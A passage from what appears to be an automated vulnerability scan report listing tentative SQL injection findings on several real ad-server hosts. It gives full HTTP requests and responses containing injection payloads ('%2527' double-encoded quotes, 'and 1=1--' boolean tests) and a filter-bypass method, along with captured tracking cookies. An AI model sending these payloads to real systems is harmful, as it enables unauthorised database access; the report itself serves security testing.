rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYxaeOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFbkoMgFET3wrcfPKJY2Y1EI0Qe8kgsDdl7gBmndH4Pp%2Bt2F2%2FwwuD6BtOwLsb1HlyBW6R6RmSVpzSiCKsMfAYz7Qu4cd6OFnavBOUYVMSRVV4ITbLFYIlF9JhgdnU94TqMP09DcnFfWUu2JZGWOJkIqnfvbk7eTtWJejlImQgLi4k0Noz8ifpfXDZibS6Z9vApj%2B35nOD24KdJ3Byhn0jIlrIalUkXZdIkp4wuNW3f%2FobLcVGfW2LvUmxe71rHLiIUtv3MgLPJ4XiIN%2FR2jIMKsE7rwYnyKeDz%2BQI%3D"; vsd=0@1@4dc81431@load.exelator.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 13:19:37 GMT
Set-Cookie: b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Wed, 09-May-2012 13:19:37 GMT
Set-Cookie: rb2=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; path=/; domain=.adbrite.com; expires=Mon, 08-Aug-2011 13:19:37 GMT
Set-Cookie: ut="1%3AXZFLloMgEEX3wtgBnyCe7EbFKJGPgImtIXtvIG239vTWrfeKwws8Mbi%2BwNiti3Hcgytwi1SPgKzyjAUUYJGAT2BiPIN2GKrewvoZoexnFXBoCi%2BEJslqYF4L6D7C5Go6Yjr3n1EXXcwLa8m2RFIRJyNBdPdu5uTtVJ2ol52UkTTzYgILZUN%2BRf1vXZZiLS%2BJcviQx%2BuHKcLtPnye5EcyJ6CsRvn6izLwzzVH1ymj85mWVz%2BJuVzQ85U15nVADlE%2F5civNvZg72LBtN60DnGK5m0v6XBaH2B%2FyCxZe8wEBWhqrTsn8k%2BB9%2Fsb"; path=/; domain=.adbrite.com; expires=Fri, 07-May-2021 13:19:37 GMT
Set-Cookie: vsd=0@1@4dc93b69@letters.salon.com; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 13:19:37 GMT
Set-Cookie: fq="86xtm%2C1uo0%7Clkzecp"; path=/; domain=.adbrite.com; expires=Wed, 09-May-2012 13:19:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 10 May 2011 13:19:37 GMT
Content-Length: 2399

var ADBRITE_setIFrameContent;

if (!ADBRITE_setIFrameContent) {
   ADBRITE_setIFrameContent = [];
}

function AdBriteRender_292a35e5_b798_439f_9862_68be7dcb20b5() {
   var frame = frames.AdBriteFrame_292a
...[SNIP]...

1.8. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [FFChanCap cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fm.js

Issue detail

The FFChanCap cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the FFChanCap cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the FFChanCap cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /bar/v16-406/c5/jsc/fm.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1%2527; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129

Response 1 (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1590B305,4479#885253|0,1,1;expires=Thu, 09 Jun 2011 13:24:16 GMT;path=/;domain=.zedo.com;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=467
Expires: Tue, 10 May 2011 13:32:03 GMT
Date: Tue, 10 May 2011 13:24:16 GMT
Connection: close
Content-Length: 6751

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat='';var zz
...[SNIP]...
;
zzWindow.document.close();
}
   }
if(zzIE) {
if(zzShowPop == 0) {
   setTimeout('zzRetryPop()',2000);
}
}
}
function zzRetryPop() {
if(!zzShowPop) {
window.showModelessDialog("javascript:function blockError(){return true;} var zedo_popwin = window.open('" + zzURL + "','_blank','toolbar=no,resizable=yes,scrollbars=no,channelmode=no,directories=no,width=430,height=600,left=" +(screen.height-600)/2 + ",top=
...[SNIP]...

Request 2

GET /bar/v16-406/c5/jsc/fm.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1%2527%2527; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129

Response 2 (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=175
Expires: Tue, 10 May 2011 13:27:12 GMT
Date: Tue, 10 May 2011 13:24:17 GMT
Connection: close
Content-Length: 904

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat='';var zz
...[SNIP]...

1.9. http://imp.fetchback.com/serve/fb/imp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /serve/fb/imp?tid=59178&type=lead&clicktrack=http://ib.adnxs.com/click/oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAQUCAAIAAAAABSaDgQAAAAA./cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA./referrer=http%253A%252F%252Fwww.huffingtonpost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%253D%2526dst%253D&1%20and%201%3d1--%20=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAgUCAAIAAAAABiaUgQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%3D%26dst%3D&tt_code=huffingtonpost.com&udj=uf%28%27a%27%2C+2248%2C+1305033483%29%3Buf%28%27c%27%2C+61473%2C+1305033483%29%3Buf%28%27r%27%2C+272040%2C+1305033483%29%3Bppv%287166%2C+%27265419216675680020%27%2C+1305033483%2C+1336569483%2C+61473%2C+25661%29%3B&cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA.&referrer=http://www.huffingtonpost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304957859_29881:55445:1:0_24309:52570:1:2885_24308:52572:1:2887_29805:59534:2:8185_29807:59535:1:8190_29802:59536:1:596888; kwd=1_1304957859_12936:262797_11317:1214591_11717:1214591_11718:1214591_11719:1214591; scg=1_1304957859; ppd=1_1304957859; uid=1_1305033466_1303179323923:6792170478871670

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:55:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1305035726_30829:59178:1:0_29881:55445:1:77867_24309:52570:1:80752_24308:52572:1:80754_29805:59534:2:86052_29807:59535:1:86057_29802:59536:1:674755; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: uid=1_1305035726_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: kwd=1_1305035726_12936:340664_11317:1292458_11717:1292458_11718:1292458_11719:1292458; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: scg=1_1305035726; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: ppd=1_1305035726; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 10 May 2011 13:55:26 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6488

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?233429ccd3f3081e4963cf7dd1c978eb4c2611e4614a3203f2d75d0f141ed609c8c6640de8bdf1052201889e865cb3a4" target="_blank" onmouseover="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice_rollover.v1.png'" onmouseout="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice.v1.png'">
<img style="float:right;position:absolute;z-index:10000;top:0px;right:0px;color:#ffffff;padding:0px;margin:0px;" src="http://images.fetchback.com/assets/ad_info/adchoice.v1.png" id="adchoice" name="adchoice" border="0"/></a>
<image id="hovergif" src="../images/blank.gif" hoverStart="0" hoverTracking="false" width="1" height="1" border="0" alt="" style="position:absolute;top:0px;left:0px;"/>
<script language="javascript" type="text/javascript">
function hoverTrack() {
// note: time is in milliseconds
document.getElementById("hovergif").hoverStart = (new Date()).getTime();
document.getElementById("hovergif").hoverTracking = "true";
   return;
}

function hoverTrackDone() {
if(document.getElementById("hovergif").hoverTracking == "true") {
       // if user has hovered for more than X milliseconds
       var diff = Math.abs((new Date()).getTime() - document.getElementById("hovergif").hoverStart);

if(diff >= 250) {
           document.getElementById("hovergif").src="hover?tid=59178&crid=30829&cb=" + Math.floor(Math.random()*100000000);
   document.getElementById("hovergif").hoverTracking = "false";

           // remove the events listeners; we do not need them anymore
           if(document.removeEventListener) {
               document.removeEventListener("mouseout", hoverTrackDone, false);
               document.removeEventListener("mouseover", hoverTrack, false);
           }

           else if(document.detachEvent) {
               document.detachEvent("onmouseout", hoverTrackDone);
               document.detachEvent("onmouseover", hoverTrack);
           }
       }
   }
   return;
}

// attach events
if(document.addEventListener) {
   document.addEventListener("mouseout", hoverTrackDone, false);
   d
...[SNIP]...

Request 2

GET /serve/fb/imp?tid=59178&type=lead&clicktrack=http://ib.adnxs.com/click/oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAQUCAAIAAAAABSaDgQAAAAA./cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA./referrer=http%253A%252F%252Fwww.huffingtonpost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%253D%2526dst%253D&1%20and%201%3d2--%20=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAgUCAAIAAAAABiaUgQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%3D%26dst%3D&tt_code=huffingtonpost.com&udj=uf%28%27a%27%2C+2248%2C+1305033483%29%3Buf%28%27c%27%2C+61473%2C+1305033483%29%3Buf%28%27r%27%2C+272040%2C+1305033483%29%3Bppv%287166%2C+%27265419216675680020%27%2C+1305033483%2C+1336569483%2C+61473%2C+25661%29%3B&cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA.&referrer=http://www.huffingtonpost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304957859_29881:55445:1:0_24309:52570:1:2885_24308:52572:1:2887_29805:59534:2:8185_29807:59535:1:8190_29802:59536:1:596888; kwd=1_1304957859_12936:262797_11317:1214591_11717:1214591_11718:1214591_11719:1214591; scg=1_1304957859; ppd=1_1304957859; uid=1_1305033466_1303179323923:6792170478871670

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:55:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1305035727_30826:59178:1:0_29881:55445:1:77868_24309:52570:1:80753_24308:52572:1:80755_29805:59534:2:86053_29807:59535:1:86058_29802:59536:1:674756; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: uid=1_1305035727_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: kwd=1_1305035727_12936:340665_11317:1292459_11717:1292459_11718:1292459_11719:1292459; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: scg=1_1305035727; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: ppd=1_1305035727; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 10 May 2011 13:55:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6502

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?262777a73fc8d937c491746a414c58568e7003d8663873dd55b3a6a9e0505bb83aaef7d13381435d2201889e865cb3a4" target="_blank" onmouseover="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice_rollover.v1.png'" onmouseout="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice.v1.png'">
<img style="float:right;position:absolute;z-index:10000;top:0px;right:0px;color:#ffffff;padding:0px;margin:0px;" src="http://images.fetchback.com/assets/ad_info/adchoice.v1.png" id="adchoice" name="adchoice" border="0"/></a>
<image id="hovergif" src="../images/blank.gif" hoverStart="0" hoverTracking="false" width="1" height="1" border="0" alt="" style="position:absolute;top:0px;left:0px;"/>
<script language="javascript" type="text/javascript">
function hoverTrack() {
// note: time is in milliseconds
document.getElementById("hovergif").hoverStart = (new Date()).getTime();
document.getElementById("hovergif").hoverTracking = "true";
   return;
}

function hoverTrackDone() {
if(document.getElementById("hovergif").hoverTracking == "true") {
       // if user has hovered for more than X milliseconds
       var diff = Math.abs((new Date()).getTime() - document.getElementById("hovergif").hoverStart);

if(diff >= 250) {
           document.getElementById("hovergif").src="hover?tid=59178&crid=30826&cb=" + Math.floor(Math.random()*100000000);
   document.getElementById("hovergif").hoverTracking = "false";

           // remove the events listeners; we do not need them anymore
           if(document.removeEventListener) {
               document.removeEventListener("mouseout", hoverTrackDone, false);
               document.removeEventListener("mouseover", hoverTrack, false);
           }

           else if(document.detachEvent) {
               document.detachEvent("onmouseout", hoverTrackDone);
               document.detachEvent("onmouseover", hoverTrack);
           }
       }
   }
   return;
}

// attach events
if(document.addEventListener) {
   document.addEventListener("mouseout", hoverTrackDone, false);
   d
...[SNIP]...

1.10. http://map.media6degrees.com/orbserv/hbjs [rdrlst cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The rdrlst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000
000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5u20000000y3m031